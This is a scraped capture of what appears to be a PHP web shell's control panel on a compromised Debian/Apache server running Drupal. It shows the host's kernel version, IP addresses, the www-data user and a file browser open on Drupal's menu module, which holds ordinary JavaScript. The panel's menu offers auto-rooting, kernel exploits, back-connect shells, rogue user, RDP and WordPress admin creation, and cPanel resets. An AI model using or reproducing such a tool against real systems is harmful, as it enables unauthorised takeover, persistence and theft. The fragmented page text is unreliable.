Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.148.117.240
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
menu /
[ HOME SHELL ]
Name
Size
Permission
Action
menu.admin.inc
27.62
KB
-rw-r--r--
menu.admin.js
1.39
KB
-rw-r--r--
menu.api.php
2.52
KB
-rw-r--r--
menu.css
117
B
-rw-r--r--
menu.info
312
B
-rw-r--r--
menu.install
6.96
KB
-rw-r--r--
menu.js
2.44
KB
-rw-r--r--
menu.module
27.65
KB
-rw-r--r--
menu.test
26.07
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : menu.admin.js
(function ($) { Drupal.behaviors.menuChangeParentItems = { attach: function (context, settings) { $('fieldset#edit-menu input').each(function () { $(this).change(function () { // Update list of available parent menu items. Drupal.menu_update_parent_list(); }); }); } }; /** * Function to set the options of the menu parent item dropdown. */ Drupal.menu_update_parent_list = function () { var values = []; $('input:checked', $('fieldset#edit-menu')).each(function () { // Get the names of all checked menus. values.push(Drupal.checkPlain($.trim($(this).val()))); }); var url = Drupal.settings.basePath + 'admin/structure/menu/parents'; $.ajax({ url: location.protocol + '//' + location.host + url, type: 'POST', data: {'menus[]' : values}, dataType: 'json', success: function (options) { // Save key of last selected element. var selected = $('fieldset#edit-menu #edit-menu-parent :selected').val(); // Remove all exisiting options from dropdown. $('fieldset#edit-menu #edit-menu-parent').children().remove(); // Add new options to dropdown. jQuery.each(options, function(index, value) { $('fieldset#edit-menu #edit-menu-parent').append( $('<option ' + (index == selected ? ' selected="selected"' : '') + '></option>').val(index).text(value) ); }); } }); }; })(jQuery);
Close